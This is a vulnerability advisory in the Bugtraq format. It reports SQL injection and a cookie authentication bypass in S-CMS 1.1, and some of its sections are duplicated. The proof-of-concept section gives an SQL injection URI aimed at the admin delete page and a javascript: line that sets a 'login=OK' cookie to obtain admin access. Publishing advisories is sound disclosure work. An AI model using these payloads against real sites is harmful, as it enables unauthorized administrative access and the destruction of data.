S-CMS SQL Injection and Cookie Authentication Bypass Vulnerabilities
BID:33799
Info
S-CMS SQL Injection and Cookie Authentication Bypass Vulnerabilities
| Bugtraq ID: | 33799 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 17 2009 12:00AM |
| Updated: | Feb 19 2009 11:17PM |
| Credit: | x0r |
| Vulnerable: |
Matteo Iammarrone S-CMS 1.1 Stable |
| Not Vulnerable: | |
Discussion
S-CMS SQL Injection and Cookie Authentication Bypass Vulnerabilities
S-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. The application is also prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Exploiting the SQL-injection issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The attacker can leverage the authentication-bypass vulnerability to gain administrative access to the affected application.
S-CMS 1.1 Stable is vulnerable; other versions may also be affected.
S-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. The application is also prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Exploiting the SQL-injection issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. The attacker can leverage the authentication-bypass vulnerability to gain administrative access to the affected application.
S-CMS 1.1 Stable is vulnerable; other versions may also be affected.
Exploit / POC
S-CMS SQL Injection and Cookie Authentication Bypass Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/path/admin/delete_page.php?id=' or 1=1/*
The following data is available:
javascript:document.cookie = "login=OK; path=/"
Attackers can use a browser to exploit these issues.
The following example URI is available:
http://www.example.com/path/admin/delete_page.php?id=' or 1=1/*
The following data is available:
javascript:document.cookie = "login=OK; path=/"
Solution / Fix
S-CMS SQL Injection and Cookie Authentication Bypass Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
S-CMS SQL Injection and Cookie Authentication Bypass Vulnerabilities
References:
References:
- Matteo Iammarrone Homepage (Matteo Iammarrone)